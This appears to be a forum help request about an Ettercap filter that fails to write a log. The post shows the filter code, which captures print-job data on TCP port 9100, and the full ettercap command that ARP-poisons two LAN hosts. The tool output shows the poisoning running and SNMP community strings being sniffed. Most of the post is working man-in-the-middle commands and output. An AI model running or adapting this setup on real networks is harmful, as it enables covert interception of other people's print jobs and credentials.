I've asked this on Ettercap's forum, but anyone who has visited there knows its mostly filled with spam ads for porn and pharmaceuticals. I've also tried to Google for "ettercap filters" but my tutorials are are the first things to come up. So, here I ask you guys.

I'm pretty sure the filter I wrote should work, but I always get the error "filter engine: Cannot open file ./logfile.log" Below is a printout of the code and all of the error messages. Any ideas on what is wrong? It's a Debian box I'm working on. Thanks.

Code:
ig:~# cat printsnarf.filter
if (ip.proto == TCP && tcp.dst == 9100) {
   log(DATA.data, "./logfile.log");
}
ig:~#


ig:~# etterfilter printsnarf.filter -o ps.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


 12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 Parsing source file 'printsnarf.filter'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'ps.ef'  done.

 -> Script encoded into 6 instructions.

ig:~# ettercap -Tq -F /root/ps.ef -M arp /192.168.22.33/ /192.168.22.193/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from /root/ps.ef...
Listening on eth0... (Ethernet)

  eth0 ->       00:E0:B8:30:4B:6C    192.168.30.130     255.255.240.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.22.33 00:60:B0:6D:47:C6

 GROUP 2 : 192.168.22.193 00:11:43:BF:AF:57
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
SNMP : 192.168.22.33:161 -> COMMUNITY: public  INFO: SNMP v1
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
SNMP : 192.168.22.193:1122 -> COMMUNITY: public  INFO: SNMP v1
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
Closing text interface...

ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

ig:~#